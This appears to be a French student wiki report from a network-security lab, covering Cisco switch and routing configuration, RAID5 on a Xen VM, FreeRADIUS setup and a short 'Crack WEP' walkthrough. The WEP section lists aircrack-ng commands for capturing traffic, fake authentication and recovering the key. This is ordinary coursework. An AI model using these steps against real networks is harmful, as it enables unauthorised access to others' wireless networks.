 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
